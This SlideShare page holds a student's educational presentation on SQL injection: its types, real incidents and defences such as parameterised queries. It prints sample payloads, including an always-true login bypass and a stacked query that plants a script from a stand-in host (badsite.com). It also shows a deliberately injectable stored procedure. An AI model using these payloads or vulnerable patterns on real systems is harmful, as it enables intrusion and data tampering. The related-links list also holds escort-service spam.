SlideShare a Scribd company logo

Sql injection

Download as PPTX, PDF
A
Aaron Hill

SQLi Presentation for IT 6873 (Fall 2014)

Technology
1 of 20
SQL Injection Aaron Hill IT 6873 Southern Polytechnic State University
What is it?  A technique where individuals insert or append commands or coding into a statement thus altering the intent and actions of the perspective query  Allows hackers to view, delete, or change data in a compromising way
Basic Examples  Utilizing a statement that is always true  Entering a value into a field that will render a statement condition as always true (1=1 or “”=“”)  SELECT field_name from table_name where username = ‘’ and 1=1 --’  Appending another command through a terminating character (such as ;)
Types of Vulnerabilities  Incorrect type handling  Database server  Blind injection  Conditional Responses  Conditional Errors  Time Delays
Combinations  SQL injection can be used in conjunction with XSS, malware, Javascript, etc.  In 2008, over 1 million websites compromised due to hybridized SQL injection attacks utilizing other components
Places of Concerns  SQL Code  HTML tags  Stored Procedures
HTML Tags  SELECT FIRST_NAME, LAST_NAME FROM CUSTOMER WHERE USERNAME = ‘’; UPDATE TABLE CUSTOMER SET MIDDLE_NAME = ‘<script src=http://badsite.com>’; --’
Stored Procedures CREATE PROCEDURE getOrdersByCustomerID @custId nvarchar[50] AS EXECUTE(“SELECT OrderID FROM Sales WHERE CustomerID = ‘” + custId + “’”);
Difficulties  Obvious attacks  Structure deletion  Denial of Service  Increase load on the system  Covert attacks  Changes to data  Changes to code
Real World: Asprox  Executable installed via phishing emails or through the network  Searches Google for vulnerable ASP sites  Downloads compromising Javascript from direct84.com  Attempts to download additional, harmful Javascript, Asprox copies, Trojan Danmec, and/or SQL attack tool
Real World: Sony  Hacked by LulzSec  Attack on several of Sony’s ventures such as SonyPictures.com and music division servers  LulzSec claimed attack resulted from a single statement  Purportedly injection may have been involved with PSN attack
Real World: Sun & MySQL  TinKode and Ne0h compromised specific Sun domains  Obtained column names and email addresses in a table  MySQL.com  Exposed metadata, account names, and passwords (both admin and blog)  Issue with Web coding, not database
Real World: CyberVors  Russian cyber criminal group  Compromised 400,000+ servers and sites  Approx 1.2 billion usernames and passwords stolen  Indiscriminant targeting of companies  Utilized different hacking methods and several individuals and groups over several years
Preventative Measures  Blacklisted Words or characters  Not recommended  Utilizing SQL Parameters  Validation Controls and field classification  Disallow error messages from revealing database metadata  Johnny’s Google Hacking Database  Johnny.ihackstuff.com/ghdb
Validation Samples if(UserID.contains(“’”)); { <redirect to an error page> } else { <perform query action hear> }
Validation Samples try { <convert input to value of specified type> } catch { <redirect to error page> }
Validation Samples string ID; database.querytext = “SELECT ID FROM TABLENAME WHERE USERID = ?”; database.addParameter(ID); database.executeQuery();
Follow up Questions What tools or techniques can be used to determine vulnerabilities within a system for SQLi?  Have you had to reassess code to prevent SQLi vulnerabilities? If so, please elaborate. What are some other modern cases involving SQLi?
References & Readings  Arthur, C. (2014). LulzSec hacker arrested over Sony attack. Retrieved from http://www.theguardian.com/technology/2012/a ug/29/lulzsec-hacker-arrest-sony-attack  Databases vulnerable to SQL injections. (2008). Data Strategy, 3(12), 6.  Dorai, R., & Kannan, V. (2011). SQL Injection- Database Attack Revolution and Prevention. Journal Of International Commercial Law & Technology, 6(4), 224-231.  International Business, T. (0006, July). Post-PSN hack: Sony apologise at E3 as LulzSec mount fresh attack. International Business Times.
 Kirk, J. (2013). Asprox botnet proves to be a resilient foe. Cio (13284045), 8.  Lemos, R. (2014). Russian Cyber-Gang Gathers 1.2B Login Credentials Via Website Flaws. Eweek, 7.  OWASP. (2014). SQL Injection. Retrieved from https://www.owasp.org/index.php/SQL_Injection  Prince, B. (2008). Botnet installs SQL injection tool. Eweek, 25(16), 21.  Sullivan, B. & Liu, Vincent. (2012). Web Application Security: A Beginner’s Guide. New York, NY: McGraw-Hill Companies.  Sun.com, MySQL.com Hacked, SQL Injection Attack. (2011). Channel Insider, 1.  W3Schools . (2014). SQL injection. Retrieved from http://www.w3schools.com/sql/sql_injection.asp

Recommended

How did i steal your database
How did i steal your databaseHow did i steal your database
How did i steal your databaseMostafa Siraj
 
SQL Injection: Amplifying Data Leakeage
SQL Injection: Amplifying Data LeakeageSQL Injection: Amplifying Data Leakeage
SQL Injection: Amplifying Data LeakeageUlisses Castro
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
Sql Injection Tutorial!
Sql Injection Tutorial!Sql Injection Tutorial!
Sql Injection Tutorial!ralphmigcute
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSSMike Crabb
 
Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresCade Zvavanjanja
 
Things to keep in mind while creating a word press plugin from scratch
Things to keep in mind while creating a word press plugin from scratchThings to keep in mind while creating a word press plugin from scratch
Things to keep in mind while creating a word press plugin from scratchElsner Technologies Pvt Ltd
 
Defcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionDefcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionAhmed AbdelSatar
 

Recommended

How did i steal your database
How did i steal your databaseHow did i steal your database
How did i steal your databaseMostafa Siraj
 
SQL Injection: Amplifying Data Leakeage
SQL Injection: Amplifying Data LeakeageSQL Injection: Amplifying Data Leakeage
SQL Injection: Amplifying Data LeakeageUlisses Castro
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
Sql Injection Tutorial!
Sql Injection Tutorial!Sql Injection Tutorial!
Sql Injection Tutorial!ralphmigcute
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSSMike Crabb
 
Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresCade Zvavanjanja
 
Things to keep in mind while creating a word press plugin from scratch
Things to keep in mind while creating a word press plugin from scratchThings to keep in mind while creating a word press plugin from scratch
Things to keep in mind while creating a word press plugin from scratchElsner Technologies Pvt Ltd
 
Defcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionDefcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionAhmed AbdelSatar
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Processn|u - The Open Security Community
 
XSS And SQL Injection Vulnerabilities
XSS And SQL Injection VulnerabilitiesXSS And SQL Injection Vulnerabilities
XSS And SQL Injection VulnerabilitiesMindfire Solutions
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure ProgrammingBalavignesh Kasinathan
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacksRespa Peter
 
SCULPT! YOUR! TESTS!
SCULPT! YOUR! TESTS!SCULPT! YOUR! TESTS!
SCULPT! YOUR! TESTS!Taras Oleksyn
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkVulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkPichaya Morimoto
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)SqliChema Alonso
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure codingHaitham Raik
 
Rapid Prototyping with Solr
Rapid Prototyping with SolrRapid Prototyping with Solr
Rapid Prototyping with SolrErik Hatcher
 
Sql injection
Sql injectionSql injection
Sql injectionNuruzzaman Milon
 
Steps to mitigate Top 5 OWASP Vulnerabilities 2013
Steps to mitigate Top 5 OWASP Vulnerabilities 2013Steps to mitigate Top 5 OWASP Vulnerabilities 2013
Steps to mitigate Top 5 OWASP Vulnerabilities 2013Jayasree Veliyath
 
10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]Olivier Dony
 
Neues aus dem Tindergarten: Auswertung "privater" APIs mit Apache Ignite
Neues aus dem Tindergarten: Auswertung "privater" APIs mit Apache IgniteNeues aus dem Tindergarten: Auswertung "privater" APIs mit Apache Ignite
Neues aus dem Tindergarten: Auswertung "privater" APIs mit Apache IgniteQAware GmbH
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primaryn|u - The Open Security Community
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php SecurityDave Ross
 
HTML 特殊文字のEscapeだけでは防げない
脆弱性について(基本)
HTML 特殊文字のEscapeだけでは防げない
脆弱性について(基本)HTML 特殊文字のEscapeだけでは防げない
脆弱性について(基本)
HTML 特殊文字のEscapeだけでは防げない
脆弱性について(基本)ssuser523509
 
SQL Injection
SQL InjectionSQL Injection
SQL InjectionAbhinav Nair
 
#34.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자교육,국...
#34.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자교육,국...#34.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자교육,국...
#34.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자교육,국...탑크리에듀(구로디지털단지역3번출구 2분거리)
 
Greensql2007
Greensql2007Greensql2007
Greensql2007Kaustav Sengupta
 
Code injection and green sql
Code injection and green sqlCode injection and green sql
Code injection and green sqlKaustav Sengupta
 

More Related Content

What's hot

XSS And SQL Injection Vulnerabilities
XSS And SQL Injection VulnerabilitiesXSS And SQL Injection Vulnerabilities
XSS And SQL Injection VulnerabilitiesMindfire Solutions
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacksRespa Peter
 
SCULPT! YOUR! TESTS!
SCULPT! YOUR! TESTS!SCULPT! YOUR! TESTS!
SCULPT! YOUR! TESTS!Taras Oleksyn
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkVulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkPichaya Morimoto
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)SqliChema Alonso
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure codingHaitham Raik
 
Rapid Prototyping with Solr
Rapid Prototyping with SolrRapid Prototyping with Solr
Rapid Prototyping with SolrErik Hatcher
 
Steps to mitigate Top 5 OWASP Vulnerabilities 2013
Steps to mitigate Top 5 OWASP Vulnerabilities 2013Steps to mitigate Top 5 OWASP Vulnerabilities 2013
Steps to mitigate Top 5 OWASP Vulnerabilities 2013Jayasree Veliyath
 
10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]Olivier Dony
 
Neues aus dem Tindergarten: Auswertung "privater" APIs mit Apache Ignite
Neues aus dem Tindergarten: Auswertung "privater" APIs mit Apache IgniteNeues aus dem Tindergarten: Auswertung "privater" APIs mit Apache Ignite
Neues aus dem Tindergarten: Auswertung "privater" APIs mit Apache IgniteQAware GmbH
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php SecurityDave Ross
 
HTML 特殊文字のEscapeだけでは防げない
脆弱性について(基本)
HTML 特殊文字のEscapeだけでは防げない
脆弱性について(基本)HTML 特殊文字のEscapeだけでは防げない
脆弱性について(基本)
HTML 特殊文字のEscapeだけでは防げない
脆弱性について(基本)ssuser523509
 
#34.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자교육,국...
#34.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자교육,국...#34.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자교육,국...
#34.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자교육,국...탑크리에듀(구로디지털단지역3번출구 2분거리)
 

What's hot (20)

OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
 
XSS And SQL Injection Vulnerabilities
XSS And SQL Injection VulnerabilitiesXSS And SQL Injection Vulnerabilities
XSS And SQL Injection Vulnerabilities
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL Injection
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacks
 
SCULPT! YOUR! TESTS!
SCULPT! YOUR! TESTS!SCULPT! YOUR! TESTS!
SCULPT! YOUR! TESTS!
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injection
 
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkVulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)Sqli
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure coding
 
Rapid Prototyping with Solr
Rapid Prototyping with SolrRapid Prototyping with Solr
Rapid Prototyping with Solr
 
Sql injection
Sql injectionSql injection
Sql injection
 
Steps to mitigate Top 5 OWASP Vulnerabilities 2013
Steps to mitigate Top 5 OWASP Vulnerabilities 2013Steps to mitigate Top 5 OWASP Vulnerabilities 2013
Steps to mitigate Top 5 OWASP Vulnerabilities 2013
 
10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]
 
Neues aus dem Tindergarten: Auswertung "privater" APIs mit Apache Ignite
Neues aus dem Tindergarten: Auswertung "privater" APIs mit Apache IgniteNeues aus dem Tindergarten: Auswertung "privater" APIs mit Apache Ignite
Neues aus dem Tindergarten: Auswertung "privater" APIs mit Apache Ignite
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php Security
 
HTML 特殊文字のEscapeだけでは防げない
脆弱性について(基本)
HTML 特殊文字のEscapeだけでは防げない
脆弱性について(基本)HTML 特殊文字のEscapeだけでは防げない
脆弱性について(基本)
HTML 特殊文字のEscapeだけでは防げない
脆弱性について(基本)
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
#34.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자교육,국...
#34.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자교육,국...#34.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자교육,국...
#34.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자교육,국...
 

Similar to Sql injection

Code injection and green sql
Code injection and green sqlCode injection and green sql
Code injection and green sqlKaustav Sengupta
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesMarco Morana
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSProtecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSskyhawk133
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacksKevin Kline
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 
Sql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseSql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseNoaman Aziz
 
SQL Injection Prevention by Adaptive Algorithm
SQL Injection Prevention by Adaptive AlgorithmSQL Injection Prevention by Adaptive Algorithm
SQL Injection Prevention by Adaptive AlgorithmIOSR Journals
 
Writing Secure Code – Threat Defense
Writing Secure Code – Threat DefenseWriting Secure Code – Threat Defense
Writing Secure Code – Threat Defenseamiable_indian
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack webhostingguy
 
OWASP Top 10 List Overview for Web Developers
OWASP Top 10 List Overview for Web DevelopersOWASP Top 10 List Overview for Web Developers
OWASP Top 10 List Overview for Web DevelopersBenjamin Floyd
 

Similar to Sql injection (20)

Greensql2007
Greensql2007Greensql2007
Greensql2007
 
Code injection and green sql
Code injection and green sqlCode injection and green sql
Code injection and green sql
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root Causes
 
ieee
ieeeieee
ieee
 
Information security
Information securityInformation security
Information security
 
Sql injection
Sql injectionSql injection
Sql injection
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSProtecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSS
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
Sql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseSql injection bypassing hand book blackrose
Sql injection bypassing hand book blackrose
 
Web App Security
Web App SecurityWeb App Security
Web App Security
 
WebApps_Lecture_15.ppt
WebApps_Lecture_15.pptWebApps_Lecture_15.ppt
WebApps_Lecture_15.ppt
 
E017131924
E017131924E017131924
E017131924
 
SQL Injection Prevention by Adaptive Algorithm
SQL Injection Prevention by Adaptive AlgorithmSQL Injection Prevention by Adaptive Algorithm
SQL Injection Prevention by Adaptive Algorithm
 
Writing Secure Code – Threat Defense
Writing Secure Code – Threat DefenseWriting Secure Code – Threat Defense
Writing Secure Code – Threat Defense
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
 
Lecture 15-16.pdf
Lecture 15-16.pdfLecture 15-16.pdf
Lecture 15-16.pdf
 
Attques web
Attques webAttques web
Attques web
 
OWASP Top 10 List Overview for Web Developers
OWASP Top 10 List Overview for Web DevelopersOWASP Top 10 List Overview for Web Developers
OWASP Top 10 List Overview for Web Developers
 
ASP.NET Web Security
ASP.NET Web SecurityASP.NET Web Security
ASP.NET Web Security
 

Recently uploaded

Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxnull - The Open Security Community
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Next-generation AAM aircraft unveiled by Supernal, S-A2
Next-generation AAM aircraft unveiled by Supernal, S-A2Next-generation AAM aircraft unveiled by Supernal, S-A2
Next-generation AAM aircraft unveiled by Supernal, S-A2Hyundai Motor Group
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraDeakin University
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your BudgetHyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your BudgetEnjoy Anytime
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 

Recently uploaded (20)

Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptx
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Next-generation AAM aircraft unveiled by Supernal, S-A2
Next-generation AAM aircraft unveiled by Supernal, S-A2Next-generation AAM aircraft unveiled by Supernal, S-A2
Next-generation AAM aircraft unveiled by Supernal, S-A2
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning era
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your BudgetHyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 

Sql injection

  • 1. SQL Injection Aaron Hill IT 6873 Southern Polytechnic State University
  • 2. What is it?  A technique where individuals insert or append commands or coding into a statement thus altering the intent and actions of the perspective query  Allows hackers to view, delete, or change data in a compromising way
  • 3. Basic Examples  Utilizing a statement that is always true  Entering a value into a field that will render a statement condition as always true (1=1 or “”=“”)  SELECT field_name from table_name where username = ‘’ and 1=1 --’  Appending another command through a terminating character (such as ;)
  • 4. Types of Vulnerabilities  Incorrect type handling  Database server  Blind injection  Conditional Responses  Conditional Errors  Time Delays
  • 5. Combinations  SQL injection can be used in conjunction with XSS, malware, Javascript, etc.  In 2008, over 1 million websites compromised due to hybridized SQL injection attacks utilizing other components
  • 6. Places of Concerns  SQL Code  HTML tags  Stored Procedures
